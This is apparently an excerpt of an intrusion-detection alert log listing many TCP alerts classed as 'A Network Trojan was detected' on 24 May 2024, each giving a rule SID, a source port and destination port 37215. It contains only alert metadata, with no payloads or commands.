              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245437
              SID:2835222
              Source Port:52942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063335
              SID:2829579
              Source Port:50998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341089
              SID:2829579
              Source Port:36150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055510
              SID:2835222
              Source Port:60340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071479
              SID:2829579
              Source Port:51416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100716
              SID:2829579
              Source Port:60794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486940
              SID:2835222
              Source Port:41628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534838
              SID:2835222
              Source Port:54950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459543
              SID:2835222
              Source Port:48824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100770
              SID:2829579
              Source Port:40788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.773231
              SID:2829579
              Source Port:49458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.814669
              SID:2829579
              Source Port:44972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230803
              SID:2829579
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333823
              SID:2835222
              Source Port:42786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254335
              SID:2835222
              Source Port:57850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270745
              SID:2835222
              Source Port:59334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.776678
              SID:2829579
              Source Port:53908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152956
              SID:2835222
              Source Port:50298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663724
              SID:2829579
              Source Port:49590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539290
              SID:2835222
              Source Port:48878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460506
              SID:2829579
              Source Port:43424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118504
              SID:2829579
              Source Port:42424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638901
              SID:2829579
              Source Port:46716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837425
              SID:2829579
              Source Port:53902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624502
              SID:2829579
              Source Port:49164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100837
              SID:2835222
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579688
              SID:2829579
              Source Port:48118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.067982
              SID:2835222
              Source Port:35536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251621
              SID:2835222
              Source Port:58154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.247660
              SID:2835222
              Source Port:38536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881797
              SID:2835222
              Source Port:53958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394894
              SID:2829579
              Source Port:42308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.513485
              SID:2835222
              Source Port:35152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061211
              SID:2829579
              Source Port:37166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188121
              SID:2829579
              Source Port:60780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169318
              SID:2829579
              Source Port:37258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972010
              SID:2835222
              Source Port:39000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268553
              SID:2835222
              Source Port:44190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230891
              SID:2829579
              Source Port:57726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856886
              SID:2829579
              Source Port:34140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268444
              SID:2829579
              Source Port:47730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633056
              SID:2835222
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341348
              SID:2829579
              Source Port:34608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282245
              SID:2835222
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574099
              SID:2829579
              Source Port:49308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079745
              SID:2835222
              Source Port:39162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208214
              SID:2835222
              Source Port:43038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100502
              SID:2829579
              Source Port:34652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395747
              SID:2835222
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313324
              SID:2829579
              Source Port:36488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411778
              SID:2829579
              Source Port:39186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542900
              SID:2835222
              Source Port:43396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549162
              SID:2835222
              Source Port:52914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831595
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400703
              SID:2829579
              Source Port:34572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186962
              SID:2829579
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481996
              SID:2835222
              Source Port:55002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394861
              SID:2835222
              Source Port:53572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340765
              SID:2835222
              Source Port:39740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574833
              SID:2829579
              Source Port:58640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231561
              SID:2835222
              Source Port:50638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662521
              SID:2829579
              Source Port:58750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188857
              SID:2829579
              Source Port:52412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197977
              SID:2835222
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692631
              SID:2829579
              Source Port:34568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118305
              SID:2835222
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486871
              SID:2835222
              Source Port:57552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234465
              SID:2829579
              Source Port:33882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.393916
              SID:2829579
              Source Port:42188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474141
              SID:2835222
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.434470
              SID:2835222
              Source Port:39862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125521
              SID:2829579
              Source Port:51622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725727
              SID:2829579
              Source Port:48594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636722
              SID:2829579
              Source Port:60584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098755
              SID:2829579
              Source Port:44324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969358
              SID:2829579
              Source Port:39998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064506
              SID:2829579
              Source Port:50088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368761
              SID:2829579
              Source Port:44156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576414
              SID:2829579
              Source Port:35158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.634116
              SID:2829579
              Source Port:52350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969018
              SID:2829579
              Source Port:58252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.242029
              SID:2835222
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303239
              SID:2829579
              Source Port:53794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487396
              SID:2829579
              Source Port:50254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860062
              SID:2835222
              Source Port:37714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975310
              SID:2829579
              Source Port:57140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187979
              SID:2829579
              Source Port:43852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478400
              SID:2835222
              Source Port:58116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920669
              SID:2835222
              Source Port:58144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487271
              SID:2829579
              Source Port:47494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148498
              SID:2835222
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490502
              SID:2829579
              Source Port:53870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155759
              SID:2835222
              Source Port:38672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.580016
              SID:2835222
              Source Port:54304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105488
              SID:2829579
              Source Port:57316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430773
              SID:2829579
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516483
              SID:2829579
              Source Port:33136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268487
              SID:2829579
              Source Port:53062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308807
              SID:2829579
              Source Port:53856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360875
              SID:2835222
              Source Port:44086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103068
              SID:2829579
              Source Port:47742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435421
              SID:2829579
              Source Port:54480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989522
              SID:2835222
              Source Port:45322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060045
              SID:2829579
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113668
              SID:2835222
              Source Port:55534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156280
              SID:2829579
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361054
              SID:2835222
              Source Port:50368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481857
              SID:2829579
              Source Port:38838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.520237
              SID:2835222
              Source Port:45564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432311
              SID:2829579
              Source Port:37534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420486
              SID:2829579
              Source Port:59880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540595
              SID:2829579
              Source Port:33534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.759855
              SID:2835222
              Source Port:58306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355047
              SID:2835222
              Source Port:44336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551140
              SID:2829579
              Source Port:34764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102427
              SID:2829579
              Source Port:47350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116279
              SID:2829579
              Source Port:45608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727054
              SID:2829579
              Source Port:57478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764381
              SID:2835222
              Source Port:53756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048831
              SID:2835222
              Source Port:35038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282914
              SID:2829579
              Source Port:55840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481388
              SID:2835222
              Source Port:56566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.607005
              SID:2829579
              Source Port:36570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696233
              SID:2835222
              Source Port:41178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148735
              SID:2835222
              Source Port:60804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098684
              SID:2829579
              Source Port:34400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.486150
              SID:2835222
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120415
              SID:2835222
              Source Port:44264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425502
              SID:2835222
              Source Port:36084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432595
              SID:2829579
              Source Port:47152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156824
              SID:2835222
              Source Port:59136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738765
              SID:2835222
              Source Port:38008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766439
              SID:2835222
              Source Port:45698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575220
              SID:2829579
              Source Port:58822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726748
              SID:2835222
              Source Port:36236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329743
              SID:2829579
              Source Port:44720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639950
              SID:2829579
              Source Port:54056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303438
              SID:2829579
              Source Port:46662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361089
              SID:2829579
              Source Port:37250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.757297
              SID:2835222
              Source Port:37340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101622
              SID:2829579
              Source Port:57296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282418
              SID:2835222
              Source Port:52702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309171
              SID:2829579
              Source Port:56768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724329
              SID:2835222
              Source Port:55104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456421
              SID:2835222
              Source Port:38108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102854
              SID:2835222
              Source Port:48428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595541
              SID:2829579
              Source Port:32930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625603
              SID:2835222
              Source Port:56550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055588
              SID:2829579
              Source Port:57178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054263
              SID:2835222
              Source Port:41534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.582014
              SID:2829579
              Source Port:35188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725535
              SID:2835222
              Source Port:36536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923541
              SID:2829579
              Source Port:48786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926761
              SID:2835222
              Source Port:44008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926935
              SID:2835222
              Source Port:41904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074016
              SID:2835222
              Source Port:35014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543590
              SID:2835222
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446372
              SID:2829579
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198731
              SID:2835222
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210899
              SID:2829579
              Source Port:56874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045297
              SID:2835222
              Source Port:50936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537822
              SID:2835222
              Source Port:59330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110910
              SID:2835222
              Source Port:59138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062215
              SID:2829579
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374565
              SID:2835222
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551348
              SID:2829579
              Source Port:43044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329359
              SID:2835222
              Source Port:43530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404554
              SID:2835222
              Source Port:45794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926911
              SID:2829579
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313297
              SID:2829579
              Source Port:50708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.410922
              SID:2835222
              Source Port:59868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522260
              SID:2835222
              Source Port:37134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154086
              SID:2829579
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188848
              SID:2835222
              Source Port:34014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432487
              SID:2829579
              Source Port:36952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636714
              SID:2835222
              Source Port:43678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118559
              SID:2829579
              Source Port:46534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819576
              SID:2829579
              Source Port:33424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400363
              SID:2835222
              Source Port:40140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.385666
              SID:2829579
              Source Port:48424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404535
              SID:2835222
              Source Port:44742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662510
              SID:2829579
              Source Port:41316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377205
              SID:2835222
              Source Port:50130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334183
              SID:2835222
              Source Port:34204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375051
              SID:2829579
              Source Port:39882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166941
              SID:2829579
              Source Port:33706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066292
              SID:2835222
              Source Port:48496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309159
              SID:2829579
              Source Port:35080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380321
              SID:2829579
              Source Port:44544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598390
              SID:2829579
              Source Port:47450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100868
              SID:2829579
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.348106
              SID:2829579
              Source Port:33976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552829
              SID:2835222
              Source Port:59682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.205849
              SID:2829579
              Source Port:39846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054097
              SID:2829579
              Source Port:55058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076971
              SID:2835222
              Source Port:40146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885875
              SID:2829579
              Source Port:50696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
